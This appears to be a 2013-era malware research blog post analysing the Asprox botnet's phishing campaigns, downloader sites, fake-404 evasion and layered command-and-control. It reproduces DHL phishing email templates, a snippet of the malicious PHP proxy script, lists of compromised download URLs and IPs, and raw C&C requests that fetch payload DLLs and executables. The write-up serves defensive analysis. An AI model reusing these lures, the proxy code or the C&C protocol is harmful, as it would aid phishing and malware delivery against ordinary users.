Asprox malware is being spread around with phishing emails claiming to be from DHL/Fedex/USPS/American Airlines/Costco/Walmart/Pizza Hut/Home Depot/Target and many others as well. It also likes to claim it is court order, funeral/wedding announcement or missed voicemail from WhatsApp.
I call this botnet Asprox based on the whitepaper from Trendmicro. Its architecture looks like enterprise cloud-based service for building the botnet of infected hosts. Infrastructure has got 2 visible load-balanced layers and at least 2 hidden inner layers.
It goes like this:
Email distribution
Phishing emails in this campaign seems to be send mostly from some hacked web-servers.Phishing email
January 2014 phishing is for energy bills.
December 2013 was a killing spree of many different phishing campaigns for Costco, BestBuy, Walmart, My CV, Adobe.
September/October 2013 templates pretend to be wedding invitations or voicemail from WhatsApp.
May-July 2013 Phishing emails direct the victims to follow to so URL to "Get Shipment Info" / or to enter shipment number on "Tracking page"URL (DHL), to "Print Receipt" to receive your parcel (FedEx), "Download It" to use the flight ticket (American Airlines) or to display "Shipment Label" (UPS).
Downloader sites
Phishing email points to compromised websites to serve ZIP file with malicious executable = Asprox downloader. On the beginning of May 2013 these sites tend to be mainly compromised Joomla 1.5 servers. At the end of May we see it is quite a lot of websites hosted in US, not necesarily Joomla related. Asprox botnet or people behind it us probably several exploits to compromise various PHP websites.
Links from phishing emails lead to compromised websites to malicious PHP script. This PHP script proxies all the requests to another backend server (in 2013 there was 1 IP in Russia (62.109.31.142) and whole bulk of IP addresses in germany (, but there is definitely more such servers. In case of failure/suspicion/ request thresh-hold the PHP script reports fake "404 Not Found" error code.Download zipfile
Victim downloads the zip file from the site containing executable file for example "Delivery Information.exe" Executable file has got icon of wordfile to convince the victim to open/run it.
Execute the downloader
When victim executes the malware, it mimics like some benign things. Notepad is opened to show some bogus tracking information.
Malware mascarades as windows binary (svchost.exe) to run hidden and undetected on the background.
Exe file is removed and replaced with a TXT file.
Comand&Control center(s) - dozens of nginx proxies
Malware contacts in round robin list of C&C for commands and downloading other malware. List of IPs is hardcoded to the downloader binary.Updated list of C&C can be obtained from the C&C. Sites contacted are another farm of compromised webservers running the nginx server configured as a reverse proxy. All requests are proxied to a backend server of C&C.Download other germs
Other malware is then downloaded, executed and so on and so forth.Another layers???
... there is possibly more layers.
The malware generated in the WhatsApp phishing campaign do have got icon of a note a fool the victims that this is some sound file.
Interesting bits
These bits make it interesting:Scale
- Group seems to be running this very same infrastructure for at least 1 year. New evasion features are being added through the time - like encrypting the requests. Campaign in May 2013 was within 2 weeks using dozens of compromised Joomla servers to serve the downloader malware. It is using dozens of servers (mostly compromised webservers) to send a spam. And as of writing the backend C&C is active at least on 34 IP adresses at once. If you consider that they probably have got more to move on and use, once the current ones are closed, the scale is really like a small enterprise.Evasion
- malicious scripts on compromised download sites stop serving malware after some time and respond with fake HTTP 404 Not Found response, probably to encourage less savvy admins to stay on the current vulnerable version, as it seems that the problem gone away by itself. Similar evasion techniques are implemented on the C&C sites.Automation
- new obfuscated malware binaries for downloader are generated at least twice a day. The binaries for FakeAV downloaded from the C&C are automatically generated each 6 minutes. This ensures that samples at the time of execution are not known to your antivirus. For AV companies it usually takes 1-3 days to make a signature and propagate it for download for the client and then another days since the victim bothers to update the antivirus signatures.Cloud
- availavility of cheap cloud services allows the "throw-away" C&C to be hosted anywhere - especially when the host is compromised server paid by somebody else :). It is surprising that the 1st and 2nd layer of C&Cs is not hosted on some bullet-proof hosting in China or Ukraine, but it is in countries like France, United Kingdom, USA, Netherlands or Germany.
Chewy details
Email Distribution
Phishing Emails
Sample DHL:If the links are not working, please move message to "Inbox" folder.
DHL
26.04.2013 PACK STATION
DHL Ship Shipment Notification
On April 25, 2013 a shipment label was printed for delivery.
The shipment number of this package is 36085695.
To get additional info about this shipment use any of these options:
1) Click the following URL in your browser:
Get Shipment Info
2) Enter the shipment number on tracking page:
Tracking Page
For further assistance, please call DHL Customer Service.
For International Customer Service, please use official DHL site.
Disclaimer:
This message was created by DHL Ship, a product of DHL, at the request
of the sender. No authentication of email address has been performed.
Deutsche Post DHL 2013 DHL International GmbH. All rights reserved.
Sample DHL Express:
DHL
EXPRESS
DOWNLOAD
MAILING LABEL
DETAILS FOR
PACKAGE
DOWNLOAD
MAILING LABEL
DATE & TIME
STATUS
TRACK ID
2013-08-01 at 11:59
Shipment not delivered
0044315795
Dear Customer, your package has arrived on August 1st, but messenger was unable to deliver the package to you, for more detailed information, please, download and read mailing label.
2013 DHL International GmbH. All rights reserved.
Downloader sites
Majority the sites serving malicious downloader file in May campaign seems to be servers with Joomla 1.5.Backed script serving the downloader is performing some limitations on the download of the malware:
- limit 4 downloads per IP - number seems to be shared across the botnet infrastructure, this limitation probably makes it low profile from services like Google Badware
- allow only certain User-Agents
- probably some other filtering (geoip?, language?)
function error_404(){
header("HTTP/1.1 404 Not Found");
$uri=preg_replace("/(\?).*\$/","",$_SERVER["REQUEST_URI"]);
$content=http_request("http://".$_SERVER["SERVER_NAME"]."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA");
$content=str_replace("/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA",$uri,$content);
exit($content);
}
Older versions (till August 2013) were using static page which was possible to use for fingerprinting the proxy script.
$ curl http://www.into-focus.de/templates/system/onlines.php?get_info=4_36160170
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head><title>404 Not Found</title></head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
</body></html>
Looks like
404 Not Found
Not Found
The requested URL was not found on this server.
The download sites are being reused at the same time for different phishing campaigns and they serve different malware binaries based on the type of the request.
| Request | Campaign | sample | Name of Exe |
| ?ticket= | American Airlines | http://andiburns.de/img/get.php?ticket=ss00_323 | Electronic Ticket.exe |
| ?get_info= | DHL | http://andiburns.de/img/get.php?get_info=ss00_323 | Shipment_Status_008436284830.exe |
| ?info= | DHL | http://andiburns.de/img/get.php?info=ss00_323 | Shipment_Status_008436284830.exe |
| ?i_info= | FedEx | http://andiburns.de/img/get.php?i_info=ss00_323 | Shipment Label.exe |
| ?receipt= | FedEx | http://andiburns.de/img/get.php?receipt=ss00_323 | Postal Receipt No00843412843.exe |
| ?receipt_print= | FedEx | http://andiburns.de/img/get.php?receipt=ss00_323 | Postal Receipt No00843412843.exe |
| ?print= | FedEx | http://andiburns.de/img/get.php?receipt=ss00_323 | Postal Receipt No00843412843.exe |
| Status | Link | IP | GeoIP |
| active | http://925geek.com/img/get.php?get_info=521_585240407 | 72.167.232.11 | US |
| active | http://adarshlifecare.org/img/get.php?get_info=ss00_323 | 108.168.250.181 | US |
| active | http://billwhiteart.com/img/get.php?get_info=ss00_323 | 98.130.102.17 | US |
| active | http://depro.co/img/get.php?info=888_449980528 | 173.201.246.128 | US |
| active | http://donpoyser.com/img/get.php?get_info=ss00_323 | 74.208.46.198 | US |
| active | http://dyermob.com/img/get.php?info=882_276561770 | 50.63.221.1 | US |
| active | http://exchangenet.com/img/get.php?get_get_info=ss00_323 | 98.124.252.131 | US |
| active | http://flavorcap.com/img/get.php?get_info=ss00_323 | 50.63.98.1 | US |
| active | http://gebhardtbmw.org/img/get.php?get_info=ss00_323 | 184.168.238.1 | US |
| active | http://gokcebeyataturk.k12.tr/img/get.php?get_info=ss00_323 | 46.20.2.139 | TR |
| active | http://hardknoxtat.com/img/get.php?get_info=ss00_323 | 67.18.19.165 | US |
| active | http://jimkilby.com/img/get.php?info=887_573138391 | 199.116.77.23 | US |
| active | http://karaihinducanada.com/img/get.php?info=891_175441593 | 64.90.61.32 | US |
| active | http://s350098153.onlinehome.us/img/get.php?info=882_734823154 | 74.208.239.124 | US |
| active | http://www.annunciationcatholicchurch.com/img/get.php?info=869_264860539 | 206.251.170.21 | US |
| active | http://www.citystreetscafe.com/img/get.php?get_info=ss00_323 | 50.63.53.148 | US |
| active | http://www.citystreetscafe.com/img/get.php?info=869_169932852 | 50.63.53.148 | US |
| active | http://www.dbarjquilts.com/img/get.php?get_info=521_969257630 | 209.235.128.16 | US |
| active | http://www.thebuffalogroup.com/img/get.php?get_info=ss00_323 | 72.167.158.245 | US |
| active | http://www.websitesbyideal.com/img/get.php?info=875_91283849 | 50.63.101.1 | US |
| active | http://www.zaravand.com/components/.o9h0qw.php?receipt=ss00_323 | 198.245.60.77 | CA |
| active | http://tradeline.in.ua/img/get.php?info=833_1616925145 | 178.208.83.20 | RU |
| active | http://autobodysecrets.com/img/get.php?info=881_66202498 | 66.147.240.180 | US |
| active | http://ezcashsystem.com/img/get.php?get_get_info=ss00_323 | 24.173.94.246 | US |
| active | http://mybuildingdesigns.com/img/get.php?info=885_180559499 | ||
| active | http://www.calanss.com/img/get.php?info=870_538703202 | 173.201.216.112 | US |
| active | http://stevenseagal.com/img/get.php?info=885_31370198 | 97.74.215.39 | US |
| active | http://thegrowingplace.com/img/get.php?info=881_97745141 | 209.237.151.16 | US |
| infected | http://loegumklosterfriskole.dk/templates/rssgets.php?info=866_42643568 | 81.7.155.10 | DK |
| infected | http://st-creative.ru/yggaqjp.php?info=844_375845004 | 89.188.101.82 | RU |
| infected | http://systemcorp.com.au/templates/rssgets.php?get_info=ss00_323 | 203.188.159.6 | AU |
| infected | http://unghanen.dk/templates/rssgets.php?get_info=ss00_323 | 176.9.62.209 | DE |
| infected | http://unghanen.dk/templates/rssgets.php?info=845_1335034365 | 176.9.62.209 | DE |
| infected | http://www.纽跃美容.com/components/.ipyxme.php?receipt=ss00_323 | 112.127.76.96 | CN |
| infected | http://www.karate.info.pl/images/index.php?info=845_633135578 | 89.161.150.95 | PL |
| infected | http://aptekapanacea.ru/images/index.php?get_info=ss00_323 | 89.232.139.17 | RU |
| infected | http://bdvi-lsa.de/templates/rssgets.php?get_info=ss00_323 | 85.214.40.177 | DE |
| infected | http://bip.sanatoria-dolnoslaskie.pl/templates/rssgets.php?get_info=ss00_323 | 89.161.191.61 | PL |
| infected | http://car4me.com.au/templates/rssgets.php?get_info=ss00_323 | 182.160.129.178 | AU |
| infected | http://cottomase.com/templates/rssgets.php?get_info=ss00_323 | 93.49.19.133 | IT |
| infected | http://maksymumradio.net/templates/rssgets.php?get_info=ss00_323 | 97.74.221.180 | US |
| infected | http://marquisgroup.org/templates/rssgets.php?info=833_1340278825 | 199.116.77.3 | US |
| infected | http://origin-id.com/dbivfmw.php?get_info=ss00_323 | 184.172.150.128 | US |
| infected | http://school1305.ru/images/index.php?get_info=ss00_323 | 78.108.80.10 | RU |
| infected | http://toptread.ru/templates/system/onlines.php?info=843_201660006 | 91.234.33.240 | UA |
| infected | http://indianapolisbjjcoach.com/templates/rssgets.php?info=831_846774942 | 50.87.36.66 | US |
| infected | http://johnyohe.com/templates/rssgets.php?info=834_1659196946 | 97.74.144.174 | US |
| infected | http://optima.is/templates/rssgets.php?get_info=ss00_323 | 93.95.225.171 | IS |
| infected | http://tda.or.jp/templates/rssgets.php?info=843_562750222 | 175.28.48.18 | JP |
| infected | http://threeforksharbor.org/templates/rssgets.php?get_info=ss00_323 | 69.163.209.92 | US |
| infected | http://www.12kopra.net/components/.lexrf6.php?receipt=ss00_323 | 212.72.115.42 | SI |
| infected | http://www.tricityministries.org/img/get.php?get_info=ss00_323 | 216.105.147.114 | US |
Sample of the PHP script can be found on this forum. It forwards the requests to some backend server with the information about the IP of the client connecting (take from proxy tags if possible).
Asprox Downloader
The downloader encrypts the requests with RC4 (see more info on the analysis from Trendmicro). Encrypted request is passed to the second layer of C&C. IP addresses of the C&Cs is hardcoded to the downloader binary. This request contains MD5 hash as identification of the victim computer and contains some action.Request gate for work
/index.php?r=gate&id=44641684AA45961586718E5F8309ADD9&group=3004spm&debug=0Id is MD5 hash identifying the victim machine. Gate responds with command to the downloader. So far I have seen 3 commands sent to downloader - rdl, run, idl. Accoriding the analysis from TrendMicro there is more commands. Gate is quite picky about the format of the request - probably to make it low-profile against the automated probes from the Anti-Malware sites. If you perform the request using ordinary browser or commands like wget, you will most likely obtain only HTTP 404 Not Found
rdl
- run dll. According to TrendMicro the DLL is encrypted with RC4. After downloaded it is injected to the svchost.exe running the downloader and is executed.GET http://5.135.115.195:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 5.135.115.195:8080 HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Fri, 24 May 2013 18:37:17 GMT Content-Type: text/html Content-Length: 86 Connection: close X-Powered-By: PHP/5.4.4-7 Vary: Accept-Encoding c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222&crc=8822c5d84333d6b5658dcb460d4d27a2GET http://5.135.115.195:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 5.135.115.195:8080 HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Fri, 24 May 18:37:19 GMT Content-Type: text/html Content-Length: 86 Connection: close X-Powered-By: PHP/5.4.4-7 Vary: Accept-Encoding c=rdl&u=/get/pg.dll.crp_bak&a=0&k=52f608b4&crc=214e3b765d01df7a5b28480fa885b84erun
- run executable - since 27-Apr-2013 till 22-05-2013 I hae seen only e3943d7369aa6add911aca18b3a507f4.exe, which is some rogue antivirus. Checking report on virustotal/threadexpert there are links also to other exe files. Since 23-May-2013 the C&Cs are serving a5347c1b5b4aa9bd13d76736eb57c67f.exe, 6b761f91b02f89f9e695d4b5a87806de.exe and b2f7e9141eb124ce3152352c5df520f7.exe. So far I do not know, what the hash filename stands for.GET http://5.135.115.195:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 5.135.115.195:8080 HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Fri, 24 May 2013 18:37:20 GMT Content-Type: text/html Content-Length: 86 Connection: close X-Powered-By: PHP/5.4.4-7 Vary: Accept-Encoding c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222&crc=8822c5d84333d6b5658dcb460d4d27a2idl
- sleep 1 secondGET http://5.135.115.195:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D6840D149348DD051BD9D0FEF740E8B2D59F7A0F966CA14D65257C66EDC3E2D416B7D6A0F864110F29504F3DEEFF53C24E57724DF8184F83ECEA10 HTTP/1.0 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: 5.135.115.195:8080 HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Fri, 24 May 2013 18:37:22 GMT Content-Type: text/html Content-Length: 86 Connection: close X-Powered-By: PHP/5.4.4-7 Vary: Accept-Encoding c=idl
Request Gate for the list of IPS
/index.php?r=gate/getipslist&id=MACHINEKEYId in this case is not whole MACHINEID (MD5 identification of victim), but just first 8 chars from that. For example:
GET http://5.135.115.195:8080/2464168416ED8D7C4F5DE9761273578F92F8D248D68D0315DA139940438195B2E568CDBBD2927A0A9262AF4E155C0D6692CDE0D117C0A5D5F907433B7E160F399D8227CF
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Host: 5.135.115.195:8080
Response is RC4 encrypted list of IPs of 3rd layer C&C to contact.
Comand&Control center(s)
Current list of active C&C sites is available from Asprox trackerDownload other germs
Files are downloaded as exe (plain exe file to be executed) or as dll. The DLL have got extension crp and seem to have very high entropy, which means it is either compressed or encrypted. More analysis of the downloader is needer to determine what is happening with the dll files after downloading.So far I have identified these files that can be downloaded as DLL modules: Corpus of Asprox Modules
In 2013 the Asprox was involved in distribution of FakeAV - new malware file (for example /get/e3943d7369aa6add911aca18b3a507f4.exe) was generated once in 6 minutes. It takes to some scheduled job another 6 minutes delay to deliver it to C&C servers. Here are samples just for one day - just to give you idea how much will your antivirus protect you against this threat. At the time of generation it is usually found as malicious only by cca 2-3 out of 46 antivirus vendors at virustotal = most probably it won't be detected by your anrivirus at the time of first execution: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457
This exe file - FakeAV - is some rogue Antivirus. Once it is executed it reports itself to some registration site in Hongkong:
http://175.41.29.181/api/urls/?ts=a58d9636ae0c6113e51ea304de4b2a0f13cfb16c&affid=70308
